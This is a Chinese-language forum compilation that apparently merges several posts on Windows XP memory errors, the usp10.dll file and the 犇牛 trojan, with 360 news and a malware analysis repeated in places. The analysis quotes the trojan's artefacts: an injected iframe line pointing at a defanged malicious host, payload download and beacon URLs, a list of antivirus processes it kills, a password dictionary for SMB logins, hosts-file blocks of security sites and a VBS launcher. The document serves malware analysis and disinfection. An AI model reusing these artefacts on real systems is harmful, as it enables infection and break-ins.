1、感染病毒
有些病毒發作時會佔用大量內存空間,導致系統出現內存不足的問題。趕快去殺毒,升級病毒庫,然後把防毒措施做好!
2、虛擬內存設置不當
虛擬內存設置不當也可能導致出現內存不足問題,一般情況下,虛擬內存大小爲物理內存大小的2倍即可,如果設置得過小,就會影響系統程序的正常運行。重新調整虛擬內存大小以WinXP爲例,右鍵點擊“我的電腦”,選擇“屬性”,然後在“高級”標籤頁,點擊“性能”框中的“設置”按鈕,切換到“高級”標籤頁,然後在“虛擬內存”框中點擊“更改”按鈕,接着重新設置虛擬內存大小,完成後重新啓動系統就好了。
3、系統空間不足
虛擬內存文件默認是在系統盤中,如WinXP的虛擬內存文件名爲“pagefile.sys”,如果系統盤剩餘空間過小,導致虛擬內存不足,也會出現內存不足的問題。系統盤至少要保留300MB剩餘空間,當然這個數值要根據用戶的實際需要而定。用戶儘量不要把各種應用軟件安裝在系統盤中,保證有足夠的空間供虛擬內存文件使用,而且最好把虛擬內存文件安放到非系統盤中。
4、因爲SYSTEM用戶權限設置不當
基於NT內核的Windows系統啓動時,SYSTEM用戶會爲系統創建虛擬內存文件。有些用戶爲了系統的安全,採用NTFS文件系統,但卻取消了SYSTEM用戶在系統盤“寫入”和“修改”的權限,這樣就無法爲系統創建虛擬內存文件,運行大型程序時,也會出現內存不足的問題。問題很好解決,只要重新賦予SYSTEM用戶“寫入”和“修改”的權限即可,不過這個僅限於使用NTFS文件系統的用戶。
虛擬內存的優化
1. 啓用磁盤寫入緩存
在“我的電腦”上單擊鼠標右鍵選擇“屬性->硬件”,打開設備管理器找到當前正在使用的硬盤,單擊鼠標右鍵選擇屬性。在硬盤屬性的的“策略”頁中,打開“啓用磁盤上的寫入緩存”。
這個選項將會激活硬盤的寫入緩存,從而提高硬盤的讀寫速度。不過要注意一點,這個功能打開後,如果計算機突然斷電可能會導致無法挽回的數據丟失。因此最好在有UPS的情況下再打開這個功能。當然,如果你平常使用計算機時不要進行什麼重要的數據處理工作,沒有UPS也無所謂,這個功能不會對系統造成太大的損失。
2. 打開Ultra MDA
在設備管理其中選擇IDE ATA/ATAPI控制器中的“基本/次要IDE控制器”,單擊鼠標右鍵選擇“屬性”,打開“高級設置”頁。這裏最重要的設置項目就是“傳輸模式”,一般應當選擇“DMA(若可用)”。
3. 配置恢復選項
Windows XP 運行過程中碰到致命錯誤時會將內存的快照保存爲一個文件,以便進行系統調試時使用,對於大多數普通用戶而言,這個文件是沒有什麼用處的,反而會影響虛擬內存的性能。所以應當將其關閉。
在“我的電腦”上單擊鼠標右鍵,選擇“屬性->高級”,在“性能”下面單擊“設置”按鈕,在“性能選項”中選擇“高級”頁。這裏有一個“內存使用”選項,如果將其設置爲“系統緩存”,Windows XP 將使用約4MB的物理內存作爲讀寫硬盤的緩存,這樣就可以大大提高物理內存和虛擬內存之間的數據交換速度。默認情況下,這個選項是關閉的,如果計算機的物理內存比較充足,比如256M或者更多,最好打開這個選項。但是如果物理內存比較緊張,還是應當保留默認的選項。
至於重裝系統,如果真的可以通過設置虛擬內存或者殺毒之類,是系統正常運作,還是建議不要重裝~
usp10.dll usp10.dll (1.409.2600.1106)
包含在軟件
名字: Windows XP Home Edition, Deutsch
信息鏈接: [url]http://www.microsoft.com/windowsxp/[/url]
文件細節
文件道路: C:\WINDOWS\system32 \ usp10.dll
文件日期: 2002-08-29 14:00:00
版本: 1.409.2600.1106
文件大小: 339.456 字節
檢查和和文件hashes
CRC32: 9DA76CA6
MD5: 06E2 217D 2AF7 50D6 69C8 AACE DD28 090B
SHA1: 7B9A 2876 45A6 A25B 8867 0229 49FE D6E6 816F 6A32
版本資源信息
公司名稱: Microsoft Corporation
文件描述: Uniscribe Unicode . processor
文件操作系統: Windows NT, Windows 2000, Windows XP, Windows 2003
文件類型: Dynamic Link Library (DLL)
文件版本: 1.409.2600.1106
內部名: Uniscribe
法律版權: Microsoft Corporation. All rights reserved.
原始的文件名: Uniscribe
產品名稱: Microsoft(R) Uniscribe Unicode . processor
產品版本: 1.409.2600.1106
用途:usp10.dll是字符顯示腳本應用程序接口相關文件。也可能爲病毒
安全等級 (0-5): 0 (N/A無危險 5最危險)
間諜軟件: 可能
廣告軟件: 否
病毒: 可能
***: 可能
系統進程: 是
應用程序: 否
後臺程序: 否
使用訪問: 否
訪問互聯網: 否
解決方法:
嘗試運行"sfc /scannow",檢查一下系統文件
部分可能爲病毒文件:
部分新出現的usp10.dll可能是病毒,只要他們沒有出現在系統文件夾內就很有可能是病毒.其作用原理爲當和該文件同一文件夾的程序運行後,usp10.dll首先發揮作用,實現上病毒網站下載***的功能.最新的卡巴已經可以刪除這種病毒.
近段時間,一種名爲犇牛的***大量爆發,該病毒用一般的方法難以清除,其威力不比機器狗差,中毒現象:系統速度明顯變慢,殺毒軟件莫名其妙的被卸載或禁用,下載軟件(如迅雷等)失效,打開進程管理器會發現進程裏面有幾個數字的進程......該病毒用一般的方法不能清除,屬頑固***,大家不要浪費時間用殺毒軟件盲目的去查殺,如果電腦裏面文件不重要的話奉勸大家重新裝下系統,文件重要的話就勉強用360的專殺工具查殺下(據我經驗,效果不明顯,專殺地址[url]http://www.360.cn/killer/360compkill.html[/url])。這裏我重點提醒下大家重裝系統後要做的事情:裝完系統不要立即進入系統,因爲該***能在其他各個分區目錄下的文件夾下生成一個名爲USP10.DLL的文件,你裝完系統的話立即打開盤就會馬上觸發***,只要一聯網該***就會馬上從網上下載大量的***,所以裝完系統最好用盤導進PE系統(沒的話開機按F8進入安全模式),進入電腦後用資源管理器的形式打開“我的電腦”,然後把隱藏文件打開(工具——文件夾選項——查看——把“隱藏受保護的操作系統文件(推薦)”勾去掉把下面的顯示所有文件和文件件的勾勾上,點確定),然後點搜索,在搜索欄裏面填上usp10.dll,然後點搜索(不要敲回車),搜出來的文件除一個顯形的usp10.dll文件保留(該文件後面註釋是styem32的路徑且日期和其他的不同)除這個文件外其他的全部刪掉就可以了。(在病毒沒清除乾淨之後不要聯網)
有些病毒發作時會佔用大量內存空間,導致系統出現內存不足的問題。趕快去殺毒,升級病毒庫,然後把防毒措施做好!
2、虛擬內存設置不當
虛擬內存設置不當也可能導致出現內存不足問題,一般情況下,虛擬內存大小爲物理內存大小的2倍即可,如果設置得過小,就會影響系統程序的正常運行。重新調整虛擬內存大小以WinXP爲例,右鍵點擊“我的電腦”,選擇“屬性”,然後在“高級”標籤頁,點擊“性能”框中的“設置”按鈕,切換到“高級”標籤頁,然後在“虛擬內存”框中點擊“更改”按鈕,接着重新設置虛擬內存大小,完成後重新啓動系統就好了。
3、系統空間不足
虛擬內存文件默認是在系統盤中,如WinXP的虛擬內存文件名爲“pagefile.sys”,如果系統盤剩餘空間過小,導致虛擬內存不足,也會出現內存不足的問題。系統盤至少要保留300MB剩餘空間,當然這個數值要根據用戶的實際需要而定。用戶儘量不要把各種應用軟件安裝在系統盤中,保證有足夠的空間供虛擬內存文件使用,而且最好把虛擬內存文件安放到非系統盤中。
4、因爲SYSTEM用戶權限設置不當
基於NT內核的Windows系統啓動時,SYSTEM用戶會爲系統創建虛擬內存文件。有些用戶爲了系統的安全,採用NTFS文件系統,但卻取消了SYSTEM用戶在系統盤“寫入”和“修改”的權限,這樣就無法爲系統創建虛擬內存文件,運行大型程序時,也會出現內存不足的問題。問題很好解決,只要重新賦予SYSTEM用戶“寫入”和“修改”的權限即可,不過這個僅限於使用NTFS文件系統的用戶。
虛擬內存的優化
1. 啓用磁盤寫入緩存
在“我的電腦”上單擊鼠標右鍵選擇“屬性->硬件”,打開設備管理器找到當前正在使用的硬盤,單擊鼠標右鍵選擇屬性。在硬盤屬性的的“策略”頁中,打開“啓用磁盤上的寫入緩存”。
這個選項將會激活硬盤的寫入緩存,從而提高硬盤的讀寫速度。不過要注意一點,這個功能打開後,如果計算機突然斷電可能會導致無法挽回的數據丟失。因此最好在有UPS的情況下再打開這個功能。當然,如果你平常使用計算機時不要進行什麼重要的數據處理工作,沒有UPS也無所謂,這個功能不會對系統造成太大的損失。
2. 打開Ultra MDA
在設備管理其中選擇IDE ATA/ATAPI控制器中的“基本/次要IDE控制器”,單擊鼠標右鍵選擇“屬性”,打開“高級設置”頁。這裏最重要的設置項目就是“傳輸模式”,一般應當選擇“DMA(若可用)”。
3. 配置恢復選項
Windows XP 運行過程中碰到致命錯誤時會將內存的快照保存爲一個文件,以便進行系統調試時使用,對於大多數普通用戶而言,這個文件是沒有什麼用處的,反而會影響虛擬內存的性能。所以應當將其關閉。
在“我的電腦”上單擊鼠標右鍵,選擇“屬性->高級”,在“性能”下面單擊“設置”按鈕,在“性能選項”中選擇“高級”頁。這裏有一個“內存使用”選項,如果將其設置爲“系統緩存”,Windows XP 將使用約4MB的物理內存作爲讀寫硬盤的緩存,這樣就可以大大提高物理內存和虛擬內存之間的數據交換速度。默認情況下,這個選項是關閉的,如果計算機的物理內存比較充足,比如256M或者更多,最好打開這個選項。但是如果物理內存比較緊張,還是應當保留默認的選項。
至於重裝系統,如果真的可以通過設置虛擬內存或者殺毒之類,是系統正常運作,還是建議不要重裝~
usp10.dll usp10.dll (1.409.2600.1106)
包含在軟件
名字: Windows XP Home Edition, Deutsch
信息鏈接: [url]http://www.microsoft.com/windowsxp/[/url]
文件細節
文件道路: C:\WINDOWS\system32 \ usp10.dll
文件日期: 2002-08-29 14:00:00
版本: 1.409.2600.1106
文件大小: 339.456 字節
檢查和和文件hashes
CRC32: 9DA76CA6
MD5: 06E2 217D 2AF7 50D6 69C8 AACE DD28 090B
SHA1: 7B9A 2876 45A6 A25B 8867 0229 49FE D6E6 816F 6A32
版本資源信息
公司名稱: Microsoft Corporation
文件描述: Uniscribe Unicode . processor
文件操作系統: Windows NT, Windows 2000, Windows XP, Windows 2003
文件類型: Dynamic Link Library (DLL)
文件版本: 1.409.2600.1106
內部名: Uniscribe
法律版權: Microsoft Corporation. All rights reserved.
原始的文件名: Uniscribe
產品名稱: Microsoft(R) Uniscribe Unicode . processor
產品版本: 1.409.2600.1106
用途:usp10.dll是字符顯示腳本應用程序接口相關文件。也可能爲病毒
安全等級 (0-5): 0 (N/A無危險 5最危險)
間諜軟件: 可能
廣告軟件: 否
病毒: 可能
***: 可能
系統進程: 是
應用程序: 否
後臺程序: 否
使用訪問: 否
訪問互聯網: 否
嘗試運行"sfc /scannow",檢查一下系統文件
部分可能爲病毒文件:
部分新出現的usp10.dll可能是病毒,只要他們沒有出現在系統文件夾內就很有可能是病毒.其作用原理爲當和該文件同一文件夾的程序運行後,usp10.dll首先發揮作用,實現上病毒網站下載***的功能.最新的卡巴已經可以刪除這種病毒.
近段時間,一種名爲犇牛的***大量爆發,該病毒用一般的方法難以清除,其威力不比機器狗差,中毒現象:系統速度明顯變慢,殺毒軟件莫名其妙的被卸載或禁用,下載軟件(如迅雷等)失效,打開進程管理器會發現進程裏面有幾個數字的進程......該病毒用一般的方法不能清除,屬頑固***,大家不要浪費時間用殺毒軟件盲目的去查殺,如果電腦裏面文件不重要的話奉勸大家重新裝下系統,文件重要的話就勉強用360的專殺工具查殺下(據我經驗,效果不明顯,專殺地址[url]http://www.360.cn/killer/360compkill.html[/url]
usp10.dll專殺工具_劍盟出品
注意 查殺後要手動替換 ctfmon.exe 文件(注意各個系統的版本對應) 因爲感染後的ctfmon.exe文件即使裝了影子也會被惡意驅動穿透保留下來 而且會釋放一個dll病毒在臨時文件夾 隱藏選項修改不過來就是其中表現之一!結束掉被替換的ctfmon.exe程序 用程序上提供的地址下載正常版本替換過來即是!
ps:添加了baohe說的那些病毒文件庫!
ps:重裝系統的情況下 要先運行本軟件 查殺一遍後清除殘留文件 再實用別的軟件 否則會優先啓動病毒文件 重裝就沒意義了 記得要斷網查殺哦!
ps:添加了baohe說的那些病毒文件庫!
ps:重裝系統的情況下 要先運行本軟件 查殺一遍後清除殘留文件 再實用別的軟件 否則會優先啓動病毒文件 重裝就沒意義了 記得要斷網查殺哦!
昨日,360安全中心緊急發佈信息:春節剛過,突然出現以“犇牛”爲名字開頭的惡性***病毒,統稱爲“牛病毒”,已有湖北電腦感染,用戶即使重裝系統,也無濟於事。 電腦中了“牛病毒”後,運行速度慢如老牛,非系統盤的根目錄及所有文件夾目錄中同時出現“usp10.dll”文件。部分中毒的電腦會彈出大量廣告網頁、殺毒軟件遭強制卸載等各種病症,會自動下載大量***病毒。用戶只能將所有硬盤分區全盤格式化,否則即便重裝系統後,“牛病毒”仍在。 360安全專家石曉虹博士介紹,牛病毒使用了“安軟殺手”對主流殺毒軟進行卸載和破壞,導致迅雷等下載軟件失效。
來自360安全中心的數據顯示,從2月9日開始,以釋放“wsock32.dll”爲主要特徵之一的“犇牛”新種——“犇牛2”的單日查殺量首度超過了“犇牛”,達100萬次以上,至此,“犇牛系”***已累計感染電腦超過150萬臺。
360安全專家石曉虹博士告訴記者,“我們完全有理由相信,‘犇牛’的背後隱藏着一個組織嚴密、技術高超、反應迅速的***病毒研發團伙,其目標不僅是要與安全廠商對抗,更是瞄準了3億網民電腦中的數字財富。”
石曉虹提醒廣大電腦用戶,“犇牛”變種“犇牛2”的生命力甚至強於“熊貓燒香”病毒,目前已成爲“犇牛”系主力軍。360安全中心對此發出橙色***病毒預警,並緊急推出最新版“360頑固***專殺大全”。
石曉虹博士表示,依據“犇牛”目前新變種的更新速度以及破壞性,未來一段時間內,“犇牛”依然是威脅互聯網安全的最大隱患。***製作團伙隨時有可能推出“犇牛”其他變種,網民千萬不能掉以輕心。
據悉,目前已知的“犇牛”傳播途徑爲訪問掛馬網頁、帶毒移動存儲的感染以及局域網主動***,石曉虹提醒廣大網民,必須儘快修復操作系統及第三方軟件漏洞,打開安全軟件的U盤防火牆後再使用U盤、數碼產品等移動存儲介質,並推薦使用360安全瀏覽器等具有防掛馬功能的瀏覽器,避免受到“犇牛”侵襲,給自己的數據安全和虛擬財產帶來損失。
來自360安全中心的數據顯示,從2月9日開始,以釋放“wsock32.dll”爲主要特徵之一的“犇牛”新種——“犇牛2”的單日查殺量首度超過了“犇牛”,達100萬次以上,至此,“犇牛系”***已累計感染電腦超過150萬臺。
360安全專家石曉虹博士告訴記者,“我們完全有理由相信,‘犇牛’的背後隱藏着一個組織嚴密、技術高超、反應迅速的***病毒研發團伙,其目標不僅是要與安全廠商對抗,更是瞄準了3億網民電腦中的數字財富。”
石曉虹提醒廣大電腦用戶,“犇牛”變種“犇牛2”的生命力甚至強於“熊貓燒香”病毒,目前已成爲“犇牛”系主力軍。360安全中心對此發出橙色***病毒預警,並緊急推出最新版“360頑固***專殺大全”。
石曉虹博士表示,依據“犇牛”目前新變種的更新速度以及破壞性,未來一段時間內,“犇牛”依然是威脅互聯網安全的最大隱患。***製作團伙隨時有可能推出“犇牛”其他變種,網民千萬不能掉以輕心。
據悉,目前已知的“犇牛”傳播途徑爲訪問掛馬網頁、帶毒移動存儲的感染以及局域網主動***,石曉虹提醒廣大網民,必須儘快修復操作系統及第三方軟件漏洞,打開安全軟件的U盤防火牆後再使用U盤、數碼產品等移動存儲介質,並推薦使用360安全瀏覽器等具有防掛馬功能的瀏覽器,避免受到“犇牛”侵襲,給自己的數據安全和虛擬財產帶來損失。
犇牛對抗安全廠商 安全團隊解析變種特徵
犇牛是年初以來傳播手段最綜合的***,傳播手段與當年的“磁碟機”***和“熊貓燒香”病毒類似,能把***種子插入電腦中的所有html網頁文件和rar壓縮文件,具備了“全盤感染”的能力。
中了“犇牛”後,症狀非常容易判斷,特徵有二:
1.電腦特別慢;
2.非系統盤下每個文件夾目錄都多出來一個不正常的dll文件,經常會跳出“虛擬內存不足”的提示。用戶重裝系統或者用ghost系統還原都不能解決,除非全盤格式化。這是由於犇牛劫持了.dll文件,並刪除了.gho鏡像文件所致。
犇牛會在中招的電腦上劃分勢力範圍,不讓其它***下載勢力染指,這個不多見,由此可見***行業內部競爭也日趨激烈。犇牛下載的***很多都出自知名盜號工作室(五家以上),主要是網遊盜號***。
現在犇牛的製作團隊正在跟安全廠商進行一場正面對抗。目前絕大部分殺毒軟件都殺不乾淨或被強行關閉、卸載,這一點各安全廠商論壇上都有用戶的求助信息。下面就給出犇牛變種的分析報告。
犇牛變種分析報告
1、遍歷全盤中的Gho、GHO、gho文件,找到就刪除。 2、遍歷全盤中的 jsp、php、aspx、asp、htm、html文件,找到就向文件尾部插入
進行網馬傳播。
3、通過 hxxp://down.skydows.cn/down.txt 這個下載列表,下載大量***。
4、直接下載hxxp://w.ssddffgg.cn/me.exe,拷貝爲c:\__default.pif,運行並進行自我更新。
5、向hxxp://w.ssddffgg.cn/7/get.asp發送本機信息,用來統計中招用戶信息。
6、釋放感染***到c:\windows\ini目錄下,並寫入desktop.ini用來僞裝成回收站。達到隱藏文件的目的。
7、遍歷進行,發現下面的進程則嘗試結束關閉:
8、遍歷當前激活面板,如果面板父窗口含有以下關鍵字,則發送關閉消息關閉面板控件:
9、寫Autorun.inf進行U盤傳播。 文件寫入recycle.{645FF040-5081-101B-9F08-00AA002F954E}\ini.exe,且在該目錄下建了一個“safe../"的畸形文件夾,用來防止刪除recycle.{645FF040-5081-101B-9F08-00AA002F954E}目錄。
10、調用Windows系統函數WNetAddConnection2A來連接其它主機的Windows文件共享和遠程訪問端口(445),一旦連接成功,使用以下密碼字典(含空口令)嘗試登錄administrator賬戶:
如果登錄成功,則向目標主機各共享文件夾下寫入一個kav32.exe的自身拷貝。
11、向c:\windows\ini目錄下寫入wsock32.dll,並將該dll複製到硬盤的每一個目錄下(系統的目錄除外)。
12、向c:\windows\tasks目錄下寫入“安裝.bat”,爲插入壓縮包作準備。
13、遍歷所有目錄下的tar、cab、tgz、zip、rar文件,並調用"%ProgramFiles%"目錄下的\WinRAR\Rar.exe,使用命令行參數將c:\windows\tasks\安裝.bat添加到這些壓縮包中。
14、修改host表,屏蔽安全廠商網站:
15、刪除金山通行證的記錄信息,達到破壞金山毒霸升級的目的。
16、破壞安全模式及帶網絡的安全模式。 17、向%windir%\ini\目錄下的shit.vbs寫入如下內容:
並調用該VBS啓動ini.exe。 18、查找AfxControlBar42s窗口類,用來關閉IceSword
中了“犇牛”後,症狀非常容易判斷,特徵有二:
1.電腦特別慢;
2.非系統盤下每個文件夾目錄都多出來一個不正常的dll文件,經常會跳出“虛擬內存不足”的提示。用戶重裝系統或者用ghost系統還原都不能解決,除非全盤格式化。這是由於犇牛劫持了.dll文件,並刪除了.gho鏡像文件所致。
犇牛會在中招的電腦上劃分勢力範圍,不讓其它***下載勢力染指,這個不多見,由此可見***行業內部競爭也日趨激烈。犇牛下載的***很多都出自知名盜號工作室(五家以上),主要是網遊盜號***。
現在犇牛的製作團隊正在跟安全廠商進行一場正面對抗。目前絕大部分殺毒軟件都殺不乾淨或被強行關閉、卸載,這一點各安全廠商論壇上都有用戶的求助信息。下面就給出犇牛變種的分析報告。
犇牛變種分析報告
1、遍歷全盤中的Gho、GHO、gho文件,找到就刪除。 2、遍歷全盤中的 jsp、php、aspx、asp、htm、html文件,找到就向文件尾部插入
| <iframe src=hxxp://derek.kalengzi.cn/a.htm width=100 height=0></iframe> |
進行網馬傳播。
3、通過 hxxp://down.skydows.cn/down.txt 這個下載列表,下載大量***。
4、直接下載hxxp://w.ssddffgg.cn/me.exe,拷貝爲c:\__default.pif,運行並進行自我更新。
5、向hxxp://w.ssddffgg.cn/7/get.asp發送本機信息,用來統計中招用戶信息。
6、釋放感染***到c:\windows\ini目錄下,並寫入desktop.ini用來僞裝成回收站。達到隱藏文件的目的。
7、遍歷進行,發現下面的進程則嘗試結束關閉:
| rfwproxy.exe、rfwmain.exe、rfwsrv.exe、Navapsvc.exe、Navapw32.exe、EGHOST.EXE、FileDsty.exe、RavTask.exe、RavMonD.exe、UlibCfg.exe、CCenter.exe、RavMon.exe、RavLite.exe、Rav.exe、kasmain.exe、kissvc.exe、kavstart.exe、kwatch.exe、kav32.exe、360Safe.exe、avp.exe、vptray.exe、mmsk.exe、THGUARD.EXE、TrojanHunter.exe、TBSCAN.EXE、WEBSCANX.EXE、Iparmor.exe、PFW.exe、AST.exe、ast.exe、360tray.exe |
8、遍歷當前激活面板,如果面板父窗口含有以下關鍵字,則發送關閉消息關閉面板控件:
| 殺毒、worm、卡巴斯基、超級巡警、江民、離線升級包、金山、Anti、anti、Virus、virus、Firewall、檢測、Mcafee、病毒、查殺、狙劍、防火牆、主動防禦、微點、防禦、系統保護、綠鷹、主動、殺馬、***、感染、清除器、上報、舉 報、舉報、瑞星、進 程、進程、低 安全、Process、NOD32、攔截、監控、安全衛士、監視、專殺 |
9、寫Autorun.inf進行U盤傳播。 文件寫入recycle.{645FF040-5081-101B-9F08-00AA002F954E}\ini.exe,且在該目錄下建了一個“safe../"的畸形文件夾,用來防止刪除recycle.{645FF040-5081-101B-9F08-00AA002F954E}目錄。
10、調用Windows系統函數WNetAddConnection2A來連接其它主機的Windows文件共享和遠程訪問端口(445),一旦連接成功,使用以下密碼字典(含空口令)嘗試登錄administrator賬戶:
| movie、woaini、baby、asdf、NULL、angel、asdfgh、1314520、5201314、caonima、88888、bbbbbb、12345678、memory、abc123、qwerty、123456、111、password、new、enter、hack、xpuser、money、yeah、time、123456movie、game、user、alex、guest、admin、test、administrator、root、nn、123、xp、love、home |
如果登錄成功,則向目標主機各共享文件夾下寫入一個kav32.exe的自身拷貝。
11、向c:\windows\ini目錄下寫入wsock32.dll,並將該dll複製到硬盤的每一個目錄下(系統的目錄除外)。
12、向c:\windows\tasks目錄下寫入“安裝.bat”,爲插入壓縮包作準備。
13、遍歷所有目錄下的tar、cab、tgz、zip、rar文件,並調用"%ProgramFiles%"目錄下的\WinRAR\Rar.exe,使用命令行參數將c:\windows\tasks\安裝.bat添加到這些壓縮包中。
14、修改host表,屏蔽安全廠商網站:
| # ****下面是惡意網站127.0.0.0 360.qihoo.com127.0.0.1 qihoo.com127.0.0.1 www.qihoo.com127.0.0.1 www.qihoo.cn127.0.0.1 124.40.51.17127.0.0.1 58.17.236.92',0127.0.0.1 www.kaspersky.com27.0.0.1 60.210.176.251127.0.0.1 www.cnnod32.cn127.0.0.1 www.lanniao.org127.0.0.1 www.nod32club.com127.0.0.1 www.dswlab.com127.0.0.1 bbs.sucop.com127.0.0.1 www.virustotal.com127.0.0.1 tool.ikaka.com,0127.0.0.1 www.jiangmin.com203.208.37.99 www.duba.net127.0.0.1 www.eset.com.cn127.0.0.1 www.nod32.com203.208.37.99 shadu.duba.net203.208.37.99 union.kingsoft.com127.0.0.1 www.kaspersky.com.cn127.0.0.1 kaspersky.com.cn127.0.0.1 virustotal.com,0127.0.0.1 www.360.cn127.0.0.1 www.360safe.cn127.0.0.1 www.360safe.com127.0.0.1 www.chinakv.com127.0.0.1 www.rising.com.cn127.0.0.1 rising.com.cn127.0.0.1 dl.jiangmin.com127.0.0.1 jiangmin.com,0 |
15、刪除金山通行證的記錄信息,達到破壞金山毒霸升級的目的。
| c:\documents and settings\all users\application data\kingsoft\kis\log.datc:\documents and settings\all users\application data\kingsoft\kis\user.dat |
16、破壞安全模式及帶網絡的安全模式。 17、向%windir%\ini\目錄下的shit.vbs寫入如下內容:
| On Error Resume NextSet rs=createObject("W..shell")rs.run "%windir%\ini\ini.exe",0 |
並調用該VBS啓動ini.exe。 18、查找AfxControlBar42s窗口類,用來關閉IceSword